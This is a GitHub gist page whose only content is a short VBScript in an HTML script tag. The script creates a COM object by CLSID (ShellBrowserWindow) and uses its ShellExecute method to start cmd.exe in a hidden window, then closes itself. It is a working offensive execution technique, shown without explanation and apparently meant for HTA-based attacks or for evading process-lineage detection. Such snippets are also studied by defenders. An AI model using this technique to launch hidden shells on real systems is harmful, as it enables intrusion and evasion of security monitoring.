Skip to content

Instantly share code, notes, and snippets.

@enigma0x3
Last active June 9, 2022 02:24
Show Gist options
  • Save enigma0x3/62f63b67bf58e466b6e4a39df1db7753 to your computer and use it in GitHub Desktop.
Save enigma0x3/62f63b67bf58e466b6e4a39df1db7753 to your computer and use it in GitHub Desktop.
<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "cmd.exe",Null,"C:\Windows\System32",Null,0
self.close
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment